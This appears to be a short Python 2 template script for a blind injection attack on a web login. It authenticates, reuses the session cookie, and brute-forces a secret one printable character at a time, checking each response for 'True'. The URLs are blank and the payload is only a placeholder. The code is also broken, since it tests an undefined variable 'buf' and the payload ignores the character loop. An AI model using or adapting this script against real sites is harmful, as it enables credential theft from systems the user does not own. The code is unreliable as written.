import urllib
import urllib2
import string

url = "" #login url
login_form = {"id":"","pw":""}
login_req = urllib.urlencode(login_form)
request = urllib2.Request(url,login_req)
response = urllib2.urlopen(request)
cookie = response.headers.get('Set-Cookie')

url2 = "" # attack url
length = 1
answer = ""

for i in range(1,200):
	if length < i:
		break
	else:
		for j in range(33,127):
			attack = {"id":"admin~~"} # 공격 패턴 입력
			attack_req = urllib.urlencode(attack)
			request2 = urllib2.Request(url2,attack_req)
			request2.add_header('cookie',cookie)
			response2 = urllib2.urlopen(request2)
			s = response2.read()
			print "%d attack" %(j)

			if buf.find("True") !=-1:
				print "[*]find!"
				print chr(j)
				answer = answer + chr(j)
				length=length+1
				break

print "[*]answer is " + answer